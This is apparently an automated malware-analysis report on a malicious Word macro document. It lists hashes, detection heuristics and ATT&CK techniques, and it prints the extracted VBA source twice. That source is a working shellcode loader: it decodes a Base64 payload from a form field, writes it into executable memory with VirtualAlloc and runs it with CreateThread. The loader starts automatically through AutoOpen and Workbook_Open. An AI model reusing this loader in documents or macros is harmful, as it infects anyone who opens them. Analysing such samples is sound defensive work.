Office (OLE) malware analysis — malicious · a640b836bcf3b9ff

MALICIOUS

Office (OLE)

46.5 KB Created: 2017-07-09 01:32:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: e95668ed9cf8ee7c16de81cc9a50b4ba SHA-1: a84e86fe2d0657cba9462338957b32400977d819 SHA-256: a640b836bcf3b9ff6a6e096c23d69a0db0cfb7572713930aa716c8ccba16a4d6

146 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros, including an AutoOpen macro, which are commonly used to download and execute malicious payloads. The presence of the VirtualAlloc API reference suggests memory manipulation for payload execution. While no specific download URL was extracted, the macro's presence and the ClamAV detection strongly indicate a downloader functionality.

Heuristics 8

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
        RunFlat
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Sub
Sub Workbook_Open()
        RunFlat
```

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

' TODO: move "auto-open" functions into different module
Sub Auto_Open()
        RunFlat

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://www.eclipse.org/legal�In document text (OLE body)
- http://www.gnu.org/licenses/lgpl.htmlIn document text (OLE body)
- http://www.gnu.org/licenses/gpl.htmlIn document text (OLE body)
- http://www.gnu.org/licenses/agpl.htmlIn document text (OLE body)
- http://www.apache.org/licensesIn document text (OLE body)
- http://www.opensource.org/licenses/bsd-license.phpIn document text (OLE body)
- http://www.opensource.org/licenses/MIT�In document text (OLE body)
- http://www.eclipse.org/legalIn document text (OLE body)
- http://www.opensource.org/licenses/MITIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8551 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8551 bytes
SHA-256: `ca3c7a7b183534eda86a88c5bc40c663d344e31fed77f124a7f567493f63aa48`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module2" ' A Base64 Encoder/Decoder. ' ' This module is used to encode and decode data in Base64 format as described in RFC 1521. ' ' Home page: www.source-code.biz. ' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland. ' ' This module is multi-licensed and may be used under the terms ' of any of the following licenses: ' ' EPL, Eclipse Public License, V1.0 or later, http://www.eclipse.org/legal ' LGPL, GNU Lesser General Public License, V2.1 or later, http://www.gnu.org/licenses/lgpl.html ' GPL, GNU General Public License, V2 or later, http://www.gnu.org/licenses/gpl.html ' AGPL, GNU Affero General Public License V3 or later, http://www.gnu.org/licenses/agpl.html ' AL, Apache License, V2.0 or later, http://www.apache.org/licenses ' BSD, BSD License, http://www.opensource.org/licenses/bsd-license.php ' MIT, MIT License, http://www.opensource.org/licenses/MIT ' ' Please contact the author if you need another license. ' This module is provided "as is", without warranties of any kind. Option Explicit Private InitDone As Boolean Private Map1(0 To 63) As Byte Private Map2(0 To 127) As Byte ' Encodes a string into Base64 format. ' No blanks or line breaks are inserted. ' Parameters: ' S a String to be encoded. ' Returns: a String with the Base64 encoded data. Public Function Base64EncodeString(ByVal s As String) As String Base64EncodeString = Base64Encode(ConvertStringToBytes(s)) End Function ' Encodes a byte array into Base64 format. ' No blanks or line breaks are inserted. ' Parameters: ' InData an array containing the data bytes to be encoded. ' Returns: a string with the Base64 encoded data. Public Function Base64Encode(InData() As Byte) Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1) End Function ' Encodes a byte array into Base64 format. ' No blanks or line breaks are inserted. ' Parameters: ' InData an array containing the data bytes to be encoded. ' InLen number of bytes to process in InData. ' Returns: a string with the Base64 encoded data. Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String If Not InitDone Then Init If InLen = 0 Then Base64Encode2 = "": Exit Function Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3 ' output length without padding Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4 ' output length including padding Dim Out() As Byte ReDim Out(0 To OLen - 1) As Byte Dim ip0 As Long: ip0 = LBound(InData) Dim ip As Long Dim op As Long Do While ip < InLen Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1 Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0 Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0 Dim o0 As Byte: o0 = i0 \ 4 Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10) Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40) Dim o3 As Byte: o3 = i2 And &H3F Out(op) = Map1(o0): op = op + 1 Out(op) = Map1(o1): op = op + 1 Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1 Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1 Loop Base64Encode2 = ConvertBytesToString(Out) End Function ' Decodes a string from Base64 format. ' Parameters: ' s a Base64 String to be decoded. ' Returns a String containing the decoded data. Public Function Base64DecodeString(ByVal s As String) As String If s = "" Then Base64DecodeString = "": Exit Function Base64DecodeString = ConvertBytesToString(Base64Decode(s)) End Function ' Decodes a byte array from Base64 format. ' Parameters ' s a Base64 String to be decoded. ' Returns: an array containing the decoded data bytes. Public Function Base64Decode(ByVal s As String) As Byte() If Not InitDone Then Init Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s) Dim ILen As Long: ILen = UBound(IBuf) + 1 If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4." Do While ILen > 0 If IBuf(ILen - 1) <> Asc("=") Then Exit Do ILen = ILen - 1 Loop Dim OLen As Long: OLen = (ILen * 3) \ 4 Dim Out() As Byte ReDim Out(0 To OLen - 1) As Byte Dim ip As Long Dim op As Long Do While ip < ILen Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1 Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1 Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A") Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A") If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _ Err.Raise vbObjectError, , "Illegal character in Base64 encoded data." Dim b0 As Byte: b0 = Map2(i0) Dim b1 As Byte: b1 = Map2(i1) Dim b2 As Byte: b2 = Map2(i2) Dim b3 As Byte: b3 = Map2(i3) If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _ Err.Raise vbObjectError, , "Illegal character in Base64 encoded data." Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10) Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4) Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3 Out(op) = o0: op = op + 1 If op < OLen Then Out(op) = o1: op = op + 1 If op < OLen Then Out(op) = o2: op = op + 1 Loop Base64Decode = Out End Function Private Sub Init() Dim c As Integer, i As Integer ' set Map1 i = 0 For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next Map1(i) = Asc("+"): i = i + 1 Map1(i) = Asc("/"): i = i + 1 ' set Map2 For i = 0 To 127: Map2(i) = 255: Next For i = 0 To 63: Map2(Map1(i)) = i: Next InitDone = True End Sub Private Function ConvertStringToBytes(ByVal s As String) As Byte() Dim b1() As Byte: b1 = s Dim l As Long: l = (UBound(b1) + 1) \ 2 If l = 0 Then ConvertStringToBytes = b1: Exit Function Dim b2() As Byte ReDim b2(0 To l - 1) As Byte Dim p As Long For p = 0 To l - 1 Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1)) If c >= 256 Then c = Asc("?") b2(p) = c Next ConvertStringToBytes = b2 End Function Private Function ConvertBytesToString(b() As Byte) As String Dim l As Long: l = UBound(b) - LBound(b) + 1 Dim b2() As Byte ReDim b2(0 To (2 * l) - 1) As Byte Dim p0 As Long: p0 = LBound(b) Dim p As Long For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next Dim s As String: s = b2 ConvertBytesToString = s End Function Attribute VB_Name = "Module1" Private Declare Function VirtualAlloc Lib "kernel32" _ (ByVal BaseAddr As Long, ByVal Size As Long, _ ByVal flags1 As Long, ByVal flags2 As Long) As Long Private Declare Sub CreateThread Lib "kernel32" _ (ByVal Zopqv As Long, ByVal Xhxi As Long, _ ByVal proc As Long, ByVal param As Long, _ ByVal Zukax As Long, Rlere As Long) Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" _ (ByVal lpDest As Long, ByRef lpSource As Byte, ByVal cbCopy As Long) ' NB. must be global in order for CreateThread to pass parameter correctly Dim avvm_stack_bottom As Long Sub RunFlat() #If Win64 Then Exit Sub #End If Dim src_data() As Byte, data_size As Long src_data = Base64Decode(UserForm1.TextBox1.Text) data_size = UBound(src_data) - LBound(src_data) + 1 Dim target_mem As Long target_mem = VirtualAlloc(0, data_size, &H1000, &H40) CopyMemory target_mem, src_data(0), data_size avvm_stack_bottom = target_mem + data_size CreateThread 0, 0, target_mem, avvm_stack_bottom, 0, 0 End Sub ' TODO: move "auto-open" functions into different module Sub Auto_Open() RunFlat End Sub Sub AutoOpen() RunFlat End Sub Sub Workbook_Open() RunFlat End Sub

SHA-256: ca3c7a7b183534eda86a88c5bc40c663d344e31fed77f124a7f567493f63aa48

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
' A Base64 Encoder/Decoder.
'
' This module is used to encode and decode data in Base64 format as described in RFC 1521.
'
' Home page: www.source-code.biz.
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland.
'
' This module is multi-licensed and may be used under the terms
' of any of the following licenses:
'
'  EPL, Eclipse Public License, V1.0 or later, http://www.eclipse.org/legal
'  LGPL, GNU Lesser General Public License, V2.1 or later, http://www.gnu.org/licenses/lgpl.html
'  GPL, GNU General Public License, V2 or later, http://www.gnu.org/licenses/gpl.html
'  AGPL, GNU Affero General Public License V3 or later, http://www.gnu.org/licenses/agpl.html
'  AL, Apache License, V2.0 or later, http://www.apache.org/licenses
'  BSD, BSD License, http://www.opensource.org/licenses/bsd-license.php
'  MIT, MIT License, http://www.opensource.org/licenses/MIT
'
' Please contact the author if you need another license.
' This module is provided "as is", without warranties of any kind.

Option Explicit

Private InitDone       As Boolean
Private Map1(0 To 63)  As Byte
Private Map2(0 To 127) As Byte

' Encodes a string into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   S         a String to be encoded.
' Returns:    a String with the Base64 encoded data.
Public Function Base64EncodeString(ByVal s As String) As String
   Base64EncodeString = Base64Encode(ConvertStringToBytes(s))
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode(InData() As Byte)
   Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
'   InLen     number of bytes to process in InData.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String
   If Not InitDone Then Init
   If InLen = 0 Then Base64Encode2 = "": Exit Function
   Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3     ' output length without padding
   Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4           ' output length including padding
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip0 As Long: ip0 = LBound(InData)
   Dim ip As Long
   Dim op As Long
   Do While ip < InLen
      Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1
      Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0
      Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0
      Dim o0 As Byte: o0 = i0 \ 4
      Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10)
      Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40)
      Dim o3 As Byte: o3 = i2 And &H3F
      Out(op) = Map1(o0): op = op + 1
      Out(op) = Map1(o1): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1
      Loop
   Base64Encode2 = ConvertBytesToString(Out)
   End Function

' Decodes a string from Base64 format.
' Parameters:
'    s        a Base64 String to be decoded.
' Returns     a String containing the decoded data.
Public Function Base64DecodeString(ByVal s As String) As String
   If s = "" Then Base64DecodeString = "": Exit Function
   Base64DecodeString = ConvertBytesToString(Base64Decode(s))
   End Function

' Decodes a byte array from Base64 format.
' Parameters
'   s         a Base64 String to be decoded.
' Returns:    an array containing the decoded data bytes.
Public Function Base64Decode(ByVal s As String) As Byte()
   If Not InitDone Then Init
   Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
   Dim ILen As Long: ILen = UBound(IBuf) + 1
   If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
   Do While ILen > 0
      If IBuf(ILen - 1) <> Asc("=") Then Exit Do
      ILen = ILen - 1
      Loop
   Dim OLen As Long: OLen = (ILen * 3) \ 4
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip As Long
   Dim op As Long
   Do While ip < ILen
      Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
      Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
      Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
      Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
      If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim b0 As Byte: b0 = Map2(i0)
      Dim b1 As Byte: b1 = Map2(i1)
      Dim b2 As Byte: b2 = Map2(i2)
      Dim b3 As Byte: b3 = Map2(i3)
      If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
      Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
      Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
      Out(op) = o0: op = op + 1
      If op < OLen Then Out(op) = o1: op = op + 1
      If op < OLen Then Out(op) = o2: op = op + 1
      Loop
   Base64Decode = Out
   End Function

Private Sub Init()
   Dim c As Integer, i As Integer
   ' set Map1
   i = 0
   For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
   Map1(i) = Asc("+"): i = i + 1
   Map1(i) = Asc("/"): i = i + 1
   ' set Map2
   For i = 0 To 127: Map2(i) = 255: Next
   For i = 0 To 63: Map2(Map1(i)) = i: Next
   InitDone = True
   End Sub

Private Function ConvertStringToBytes(ByVal s As String) As Byte()
   Dim b1() As Byte: b1 = s
   Dim l As Long: l = (UBound(b1) + 1) \ 2
   If l = 0 Then ConvertStringToBytes = b1: Exit Function
   Dim b2() As Byte
   ReDim b2(0 To l - 1) As Byte
   Dim p As Long
   For p = 0 To l - 1
      Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
      If c >= 256 Then c = Asc("?")
      b2(p) = c
      Next
   ConvertStringToBytes = b2
   End Function

Private Function ConvertBytesToString(b() As Byte) As String
   Dim l As Long: l = UBound(b) - LBound(b) + 1
   Dim b2() As Byte
   ReDim b2(0 To (2 * l) - 1) As Byte
   Dim p0 As Long: p0 = LBound(b)
   Dim p As Long
   For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
   Dim s As String: s = b2
   ConvertBytesToString = s
   End Function


Attribute VB_Name = "Module1"
Private Declare Function VirtualAlloc Lib "kernel32" _
        (ByVal BaseAddr As Long, ByVal Size As Long, _
        ByVal flags1 As Long, ByVal flags2 As Long) As Long

Private Declare Sub CreateThread Lib "kernel32" _
        (ByVal Zopqv As Long, ByVal Xhxi As Long, _
        ByVal proc As Long, ByVal param As Long, _
        ByVal Zukax As Long, Rlere As Long)

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" _
         (ByVal lpDest As Long, ByRef lpSource As Byte, ByVal cbCopy As Long)

' NB. must be global in order for CreateThread to pass parameter correctly
Dim avvm_stack_bottom As Long

Sub RunFlat()
#If Win64 Then
        Exit Sub
#End If
        Dim src_data() As Byte, data_size As Long
        src_data = Base64Decode(UserForm1.TextBox1.Text)
        data_size = UBound(src_data) - LBound(src_data) + 1
        
        Dim target_mem As Long
        target_mem = VirtualAlloc(0, data_size, &H1000, &H40)
        CopyMemory target_mem, src_data(0), data_size
        
        avvm_stack_bottom = target_mem + data_size
        CreateThread 0, 0, target_mem, avvm_stack_bottom, 0, 0
End Sub


' TODO: move "auto-open" functions into different module
Sub Auto_Open()
        RunFlat
End Sub
Sub AutoOpen()
        RunFlat
End Sub
Sub Workbook_Open()
        RunFlat
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.